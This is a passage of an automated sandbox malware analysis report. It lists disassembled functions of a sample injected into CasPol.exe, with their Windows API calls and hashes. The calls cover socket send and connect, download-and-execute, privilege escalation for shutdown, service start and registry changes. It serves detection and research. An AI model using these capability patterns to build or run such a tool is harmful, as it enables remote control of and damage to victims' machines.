                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                                                                  • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                  • API String ID: 3534403312-3733053543
                                                                                                                                                                                                                                  • Opcode ID: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                                                                                                                                                                                  • Instruction ID: c28276ca820f5d67da4083ad645d4fedab17ddc29f560671af9b7c8b6b4fa774
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 25F0D4B5805229BBDB10ABA1EC4DEEF7EBCEF05656F100061B805E2192D6748A44CAB5
                                                                                                                                                                                                                                  Function 004089A9 Relevance: 9.3, APIs: 6, Instructions: 288fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 004089AE
                                                                                                                                                                                                                                    • Part of subcall function 004041F1: socket.WS2_32(00000002,00000001,00000006), ref: 00404212
                                                                                                                                                                                                                                    • Part of subcall function 0040428C: connect.WS2_32(?,00F5D160,00000010), ref: 004042A5
                                                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
                                                                                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
                                                                                                                                                                                                                                  • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7
                                                                                                                                                                                                                                    • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(00000288,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
                                                                                                                                                                                                                                    • Part of subcall function 00404468: SetEvent.KERNEL32(00000288,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
                                                                                                                                                                                                                                    • Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                                                                                                                                                                                                                                    • Part of subcall function 004047EB: SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                                                                                                                                                                                                                    • Part of subcall function 004047EB: CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1
                                                                                                                                                                                                                                    • Part of subcall function 00404468: send.WS2_32(000002C8,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4043647387-0
                                                                                                                                                                                                                                  • Opcode ID: 8c870fa1ddbc7ef26fe159e2ea481eb797ca588a6453dea898a82669f51445a2
                                                                                                                                                                                                                                  • Instruction ID: d7705bc86650fd6632c5f082d335fbcd32bd3fe840799e2454ee74f5ab9ae988
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8c870fa1ddbc7ef26fe159e2ea481eb797ca588a6453dea898a82669f51445a2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 11A15C729001089ACB14EBA1DD92AEDB778AF54318F10427FF546B71D2EF385E498B98
                                                                                                                                                                                                                                  Function 100073F0 Relevance: 9.2, APIs: 6, Instructions: 215fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 1000744D
                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(000000FF,80000000,00000001,00000000,00000003,00000080,00000000), ref: 100075C9
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 1000765E
                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 10007665
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseFileFind$CreateFirstHandle
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3283578348-0
                                                                                                                                                                                                                                  • Opcode ID: 59a1705bc7755bb769e0b5acb170d7105e02174513c7add7ae537a9481892608
                                                                                                                                                                                                                                  • Instruction ID: e7c7038f638e567c979eff5cb874745e3cf8d5b40648ff69d52a7e1f1d2920ba
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 59a1705bc7755bb769e0b5acb170d7105e02174513c7add7ae537a9481892608
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5781C370D00209EAFB10CFA4CC84BEEBBB9FF14394F610519E809E7294D775AA45CB61
                                                                                                                                                                                                                                  Function 00419BC4 Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0041981A,00000000,00000000), ref: 00419BCD
                                                                                                                                                                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0041981A,00000000,00000000), ref: 00419BE2
                                                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419BEF
                                                                                                                                                                                                                                  • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041981A,00000000,00000000), ref: 00419BFA
                                                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0C
                                                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0F
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 276877138-0
                                                                                                                                                                                                                                  • Opcode ID: f46ec876707130a0260c1e36ee5cf16398cc126bc88f3db2dc71360ab7e78e5c
                                                                                                                                                                                                                                  • Instruction ID: 9ab78235182221d9a13884b701025ebbd4d22640777282bd149d85cf0e5c5631
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f46ec876707130a0260c1e36ee5cf16398cc126bc88f3db2dc71360ab7e78e5c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 46F0E971404314AFD2115B31FC88DBF2AACEF85BA2B00043AF54193191CF68CD4595B9
                                                                                                                                                                                                                                  Function 004158B9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 97libraryloadershutdownCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00416AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                                                                                                                                                                    • Part of subcall function 00416AB7: OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                                                                                                                                                                    • Part of subcall function 00416AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                                                                                                                                                                    • Part of subcall function 00416AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                                                                                                                                                                    • Part of subcall function 00416AB7: GetLastError.KERNEL32 ref: 00416B02
                                                                                                                                                                                                                                  • ExitWindowsEx.USER32(00000000,00000001), ref: 0041595B
                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00415970
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00415977
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                                                                                                                                                                  • String ID: PowrProf.dll$SetSuspendState
                                                                                                                                                                                                                                  • API String ID: 1589313981-1420736420
                                                                                                                                                                                                                                  • Opcode ID: 34540028d8d69b8cc76def8d8097697da3db95b9dda25f0b1b2355908cec2eba
                                                                                                                                                                                                                                  • Instruction ID: 94bd0be5b4d635cf3270abd21b93e0cba208aed3fdadf5553bbce7524c8ebf13
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 34540028d8d69b8cc76def8d8097697da3db95b9dda25f0b1b2355908cec2eba
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7D2150B0604741E6CA14F7B19856AEF225A9F80748F40883FB402A72D2EF7CDC89865E
                                                                                                                                                                                                                                  Function 004511E3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,00451502,?,00000000), ref: 0045127C
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,00451502,?,00000000), ref: 004512A5
                                                                                                                                                                                                                                  • GetACP.KERNEL32(?,?,00451502,?,00000000), ref: 004512BA
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                  • String ID: ACP$OCP
                                                                                                                                                                                                                                  • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                  • Opcode ID: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                                                                                                                                                                  • Instruction ID: bcb6c1b5649eca6e102b6d6ca9fa22aa61ab34f591545d84575f60c76f210f03
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 50212722600100A6D7348F54D900BAB73A6AB40B66F1645E6FD09E7322F736DD49C799
                                                                                                                                                                                                                                  Function 0041A63F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A650
                                                                                                                                                                                                                                  • LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A664
                                                                                                                                                                                                                                  • LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A66B
                                                                                                                                                                                                                                  • SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67A
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                                                  • String ID: SETTINGS
                                                                                                                                                                                                                                  • API String ID: 3473537107-594951305
                                                                                                                                                                                                                                  • Opcode ID: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                                                                                                                                                                  • Instruction ID: 83a829ee02157d331b98a48cb758db5ec39b6d120b3a3db205f860a33549a403
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3EE01A3A200710ABCB211BA5BC8CD477E39E7867633140036F90582331DA358850CA59
                                                                                                                                                                                                                                  Function 00407A8C Relevance: 7.7, APIs: 5, Instructions: 183fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00407A91
                                                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Find$File$CloseFirstH_prologNext
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1157919129-0
                                                                                                                                                                                                                                  • Opcode ID: 42d1d4c091d82d6b396b89ee898a46a68c2b2ca206e606c948993fc602420786
                                                                                                                                                                                                                                  • Instruction ID: c296e4c637b16ec180f1d25cf2666c4e6f2336455dd814d501b84ef2841b6e91
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 42d1d4c091d82d6b396b89ee898a46a68c2b2ca206e606c948993fc602420786
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 485173329041085ACB14FB65DD969DD7778AF50318F50417EB806B31E2EF38AB498B99
                                                                                                                                                                                                                                  Function 0044800F Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 004480F1
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044811E
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00448067
                                                                                                                                                                                                                                    • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                                                                                                                                                                                    • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00448233
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1286116820-0
                                                                                                                                                                                                                                  • Opcode ID: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                                                                                                                                                                                                                  • Instruction ID: adcac59616ce0bf4d9b6f5e4feac4fc1c4b096f081e8a0f87c9a15d47e4c4f65
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 13510B719002099BE714DF69DC819AFB7BCEF41354F10456FE454A32A1EF389E46CB58
                                                                                                                                                                                                                                  Function 00406128 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
                                                                                                                                                                                                                                  • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DownloadExecuteFileShell
                                                                                                                                                                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$open
                                                                                                                                                                                                                                  • API String ID: 2825088817-4197237851
                                                                                                                                                                                                                                  • Opcode ID: 4371f63f3fe4ec0a1073940421a41f63b853e6c01c94ef678255c2defe111c5e
                                                                                                                                                                                                                                  • Instruction ID: f68f5450864a8ef507c8d3860f756bd811b48be2db930e76b40a644c5c1bb7bc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4371f63f3fe4ec0a1073940421a41f63b853e6c01c94ef678255c2defe111c5e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0761A33160434067CA14FA76C8569BE77A69F81718F00493FBC46772D6EF3C9A05C69B
                                                                                                                                                                                                                                  Function 00406AC2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
                                                                                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
                                                                                                                                                                                                                                    • Part of subcall function 00404468: send.WS2_32(000002C8,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileFind$FirstNextsend
                                                                                                                                                                                                                                  • String ID: x@G$x@G
                                                                                                                                                                                                                                  • API String ID: 4113138495-3390264752
                                                                                                                                                                                                                                  • Opcode ID: 32f47642e896df137da13f3a14433bf094b4848cdaa96fb84e8fbcca2ccac24a
                                                                                                                                                                                                                                  • Instruction ID: 9df0c8526107c53e8273efc1e688d8f669138e67c86485f4ac558c26d22f9560
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 32f47642e896df137da13f3a14433bf094b4848cdaa96fb84e8fbcca2ccac24a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B42147725043015BC714FB61D8959AF77A8AFD1358F40093EF996A31D1EF38AA088A9B
                                                                                                                                                                                                                                  Function 0041BB77 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                                                                                                                                                                                    • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                                                                                                                                                                                                                    • Part of subcall function 004126D2: RegSetValueExA.KERNEL32(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                                                                                                                                                                                                                    • Part of subcall function 004126D2: RegCloseKey.KERNEL32(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseCreateInfoParametersSystemValue
                                                                                                                                                                                                                                  • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                                                                                                                                                  • API String ID: 4127273184-3576401099
                                                                                                                                                                                                                                  • Opcode ID: f4ba7aec24a953ef4b92a26ea97f229a08492362b077529f009aa708e5b31fc0
                                                                                                                                                                                                                                  • Instruction ID: a6c166168c7895b99543370299e99232025f4d6daba66cbb636fef562e17b9dc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f4ba7aec24a953ef4b92a26ea97f229a08492362b077529f009aa708e5b31fc0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 06112432B8060433D514303A4E6FBAE1806D356B60FA4415FF6026A6DAFA9E5AE103DF
                                                                                                                                                                                                                                  Function 00450A7F Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                                                                                                                                                                                                    • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                                                                                                                                    • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                                                                                                                                                                                                    • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                                                                                                                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00443CF3,?,?,?,?,?,?,00000004), ref: 00450B61
                                                                                                                                                                                                                                  • _wcschr.LIBVCRUNTIME ref: 00450BF1
                                                                                                                                                                                                                                  • _wcschr.LIBVCRUNTIME ref: 00450BFF
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00443CF3,00000000,00443E13), ref: 00450CA2
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
